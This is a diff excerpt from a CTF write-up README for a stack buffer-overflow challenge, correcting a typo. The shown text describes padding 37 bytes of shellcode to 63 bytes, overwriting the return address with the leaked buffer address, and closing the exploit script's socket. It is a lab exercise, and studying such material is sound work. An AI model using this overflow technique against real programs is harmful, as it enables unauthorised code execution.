neuronflicker/CTF/UCF/Pwn_stack0pt2/README.md

 # Close the socket
 exec 3<&-
 ```
 The code has 37 characters in it, so we add an extra 26 to make up the 63 we need.
 Then we add the address of the buffer as the return address.
-This initial code is out `ls` code, so the output from running this script is:
+This initial code is our `ls` code, so the output from running this script is:
 ```
 > ./hack_stack0pt2.sh
 Found: Debug info: Address of input buffer = 0xff8c084d